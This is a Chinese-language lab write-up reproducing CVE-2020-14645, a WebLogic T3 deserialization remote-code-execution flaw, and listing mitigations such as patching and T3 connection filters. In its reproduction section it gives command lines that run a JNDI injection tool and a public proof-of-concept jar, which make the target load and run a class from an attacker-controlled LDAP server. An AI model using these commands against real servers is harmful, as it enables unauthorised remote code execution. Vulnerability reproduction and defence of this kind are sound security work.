2. 程式人生 > 實用技巧 >CVE-2020-14645 Weblogic遠端程式碼執行漏洞復現

CVE-2020-14645 Weblogic遠端程式碼執行漏洞復現

阿新 發佈:2020-08-23

CVE-2020-14645 Weblogic遠端程式碼執行漏洞復現

漏洞介紹

今日,Oracle官方釋出WebLogic安全更新,其中修復了一個CVSS評分為9.8的嚴重漏洞(CVE-2020-14645),該漏洞通過T3協議進行利用,攻擊者可以實現遠端程式碼執行,進而控制伺服器。由於漏洞利用複雜度低,風險高,建議儘快修復。

WebLogic是美國Oracle公司出品的一個application server,是一個基於JAVAEE架構的中介軟體,WebLogic是用於開發、整合、部署和管理大型分散式Web應用、網路應用和資料庫應用的Java應用伺服器。Oracle WebLogic Server存在遠端程式碼執行漏洞。

攻擊者可利用該漏洞實現遠端程式碼執行。該反序列化的gadget存在與coherence包中。編號CVE-2020-14645。

構造chain類似於common-collection的chain,可以照葫蘆畫瓢。

mvn 好像不能下載coherence包,很奇怪,直接下jar包就行。

反序列化的物件,通過t3傳送給weblogic即可。所以,這個只是生成payload的工具。

影響範圍

  • Oracle Oracle WebLogic Server 10.3.6.0.0
  • Oracle WebLogic Server 12.2.1.4.0
  • Oracle WebLogic Server 12.2.1.3.0
  • Oracle WebLogic Server 12.1.3.0.0
  • Oracle WebLogic Server 14.1.1.0.0

環境搭建

WebLogic 12.2.1.4官方下載連結:

https://download.oracle.com/otn/nt/middleware/12c/122140/fmw_12.2.1.4.0_wls_lite_Disk1_1of1.zip

下載JDK 6u211/7u201/8u191任意版本並配置環境變數

JDK8u191
下載地址:https://pan.baidu.com/s/1cCtSolwsZCmL7xN6orTjTw
提取碼:nmi1

用管理員許可權開啟CMD命令

java -jar fmw_12.2.1.4.0_wls_lite_generic.jar

全部點選下一步,勾選自主啟動配置嚮導選項

建立新域並勾選所有模板,點選下一步至安裝完成

安裝成功後,跳到base_domain目錄下

C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain

執行startWebLogic.cmd

可訪問7001埠(http://192.168.1.111:7001/console/login/LoginForm.jsp),說明環境部署成功

漏洞復現

JNDI工具下載地址

https://github.com/welk1n/JNDI-Injection-Exploit

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C [command] -A [address]

使用JNDI工具搭建LDAP和HTTP服務,注意不能佔用8180/1099/1389三個埠,修改要執行的命令後回車,會同時啟動LDAP/RMI/HTTP三種服務,並且自動編譯好帶命令的class檔案

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C calc -A 192.168.1.236

使用CVE-2020-14645漏洞驗證工具

https://github.com/DSO-Lab/Weblogic_CVE-2020-14645

java -jar CVE-2020-14645.jar LDAP_IP:LDAP_PORT/#Exploit http://192.168.1.111:7001

輸入JNDI工具搭建LDAP地址和埠

java -jar CVE-2020-14645.jar 192.168.1.236:1389/mcq0vt http://192.168.1.111:7001

輸入命令請求LDAP服務,執行自動編譯的class檔案,成功彈出計算器(失敗,無法彈出計算器)

PS:java版本<jdk 6u211/7u201/8u191,我用的是8u191,最後沒有復現成功,通過本地測試發現報錯如下:

​ 原因是在更高版本的JDK環境中trustURLCodebase變數為false,限制了遠端類的載入。

修復建議

1、官方修復方案

Oracle已經發布補丁修復了上述漏洞,請使用者參考官方通告及時下載受影響產品更新補丁,並參照補丁安裝包中的readme檔案進行安裝更新,以保證長期有效的防護。

注:Oracle官方補丁需要使用者持有正版軟體的許可賬號,使用該賬號登陸https://support.oracle.com後,可以下載最新補丁。

2、臨時解決方案

使用者可通過控制T3協議的訪問來臨時阻斷針對這些漏洞的攻擊。操作方法如下:

  1. 進入WebLogic控制檯,在base_domain的配置頁面中,進入“安全”選項卡頁面,點選“篩選器”,進入連線篩選器配置。
  2. 在連線篩選器中輸入:weblogic.security.net.ConnectionFilterImpl,參考以下寫法,在連線篩選器規則中配置符合企業實際情況的規則:
127.0.0.1 * * allow t3 t3s
本機IP * * allow t3 t3s
允許訪問的IP  * * allow t3 t3s  
* * * deny t3 t3s
  1. 儲存後若規則未生效,建議重新啟動WebLogic服務(重啟WebLogic服務會導致業務中斷,建議相關人員評估風險後,再進行操作)。

3、禁用IIOP協議。

可通過關閉 IIOP 協議對此漏洞進行緩解。操作如下:

  1. 在 Weblogic 控制檯中,選擇“服務”->”AdminServer”->”協議”,取消“啟用 IIOP”的勾選。

  2. 並重啟 Weblogic 專案,使配置生效。

相關推薦

CVE-2020-14645 Weblogic遠端程式碼執行漏洞復現

CVE-2020-14645Weblogic遠端程式碼執行漏洞復現 漏洞介紹 今日,Oracle官方釋出WebLogic安全更新,其中修復了一個CVSS評分為9.8的嚴重漏洞(CVE-2020-14645),該漏洞通過T3協議進行利用,攻擊者可以實現遠端程式碼執行

CVE-2020-0674 IE遠端程式碼執行漏洞

0x00 漏洞描述 該漏洞影響元件為jscript.dll,該動態連結庫是微軟Internet Explorer瀏覽器的Javascript引擎之一,其中IE8及以下使用jscript.dll,IE9及以上預設使用jscript9.dll,但網頁可以通過《script》標籤指定

S2-052(CVE-2017-9805) 遠端程式碼執行漏洞復現

0x01 漏洞說明 漏洞編號:CVE-2017-9805(S2-052)影響版本: Struts 2.1.2 - Struts 2.3.33, Struts 2.5 - Struts 2.5.12漏洞詳情:http://struts.apache.org/docs/s2-052.html

Weblogic遠端程式碼執行漏洞(CVE-2020-14645)

簡介 WebLogic是美國Oracle公司出品的一個application server,確切的說是一個基於JAVAEE架構的中介軟體,WebLogic是用於開發、整合、部署和管理大型分散式Web應用、網路應用和資料庫應用的Java應用伺服器。

Weblogic遠端命令執行漏洞復現(CVE-2020-14645)

影響版本 Oracle WebLogic Server 10.3.6.0.0 Oracle WebLogic Server 12.1.3.0.0 Oracle WebLogic Server 12.2.1.3.0

CVE-2020-5902 F5 BIG-IP 遠端程式碼執行漏洞復現

CVE-2020-5902 F5 BIG-IP 遠端程式碼執行漏洞復現 漏洞介紹 F5 BIG-IP 是美國 F5 公司的一款集成了網路流量管理、應用程式安全管理、負載均衡等功能的應用交付平臺。

F5 BIG-IP 遠端程式碼執行漏洞復現CVE-2020-5902)

0x01 漏洞詳情 F5 BIG-IP 是美國F5公司一款整合流量管理、DNS、出入站規則、web應用防火牆、web閘道器、負載均衡等功能的應用交付平臺。

Jenkins-CI 遠端程式碼執行漏洞復現CVE-2017-1000353)

0x01 環境 使用vulhub搭建漏洞環境 /vulhub-master/jenkins/CVE-2017-1000353 http://192.168.255.130:8080/

[CVE-2012-0392] Apache Struts 2遠端程式碼執行漏洞復現(第五彈)

棄之可惜 0x00 漏洞概述 編號為CVE-2012-0392。 即S2-008,實際上是多個漏洞的集合。

Spring Cloud Gateway 遠端程式碼執行漏洞復現CVE-2022-22947

漏洞說明 2022年3月1日,VMware官方釋出漏洞報告,在使用Spring Colud Gateway的應用程式開啟、暴露Gateway Actuator端點時,會容易造成程式碼注入攻擊,攻擊者可以製造惡意請求,在遠端主機進行任意遠端執行

Spring Framework遠端程式碼執行漏洞復現(CVE-2022-22965)

1.漏洞描述     漏洞名稱 Spring Framework遠端程式碼執行漏洞 公開時間 2022-03-29 更新時間

Office CVE-2017-8570遠端程式碼執行漏洞復現

CVE-2017-8570漏洞是一個邏輯漏洞,利用方法簡單,影響範圍廣。由於該漏洞和三年前的SandWorm(沙蟲)漏洞非常類似,因此我們稱之為“沙蟲”二代漏洞

CVE-2022-22947 Spring Cloud Gateway 遠端程式碼執行漏洞復現

一、漏洞概述 2022年3月1日,VMware官方釋出漏洞報告,在使用Spring Colud Gateway的應用程式開啟、暴露Gateway Actuator端點時,會容易造成程式碼注入攻擊,攻擊者可以製造惡意請求,在遠端主機進行任意遠端執行

Joomla-3.4.6遠端程式碼執行漏洞復現

#01 Joomla簡介 Joomla!是一套自由、開放原始碼的內容管理系統,以PHP撰寫,用於釋出內容在全球資訊網與內部網,通常被用來搭建商業網站、個人部落格、資訊管理系統、Web 服務等,還可以進行二次開發以擴充使用範圍。

Jackson遠端程式碼執行漏洞復現(不使用vluhub,手寫transletBytecodes欄位)

今天花了一天的時間復現Jackson遠端程式碼執行漏洞,查詢vulhub可以看到存在CVE-2017-7525的漏洞環境,根據網上的教程,的確可以復現成功。

Apache Struts 2遠端程式碼執行漏洞復現

沒學會的SSH = Struts2 + Spring + Hibernate Apache Struts 2是一個基於MVC模式的Web應用框架,本質上相當於一個servlet。在MVC設計模式中,Struts 2作為控制器建立模型和檢視的資料互動。

Drupal遠端程式碼執行漏洞復現

最好的CMS之一 0x00 漏洞概述 編號為CVE-2018-7600。 Drupal是用PHP開發的開源內容管理框架(CMF),由內容管理系統(CMS)和PHP開發框架(Framework)共同組成。

Apache Struts 2遠端程式碼執行漏洞復現(第三彈)

Double Kill 0x00 漏洞概述 編號為CVE-2017-5638。 官方描述是: It is possible to perform a RCE attack with a malicious Content-Type value. If the Content-Type value isn\'t valid an exception is th

Apache Struts 2遠端程式碼執行漏洞復現(第二彈)

即S2-048 0x00 漏洞概述 編號為CVE-2017-9791。 官方描述是: It is possible to perform a RCE attack with a malicious field value when using the Struts 2 Struts 1 plugin and it\'s a Struts 1 action

Apache Struts2 S2-013遠端程式碼執行漏洞復現

墨者學院開的靶場 進入環境 Struts2-013好傢伙,框架直接寫臉上,怕人看不出來= =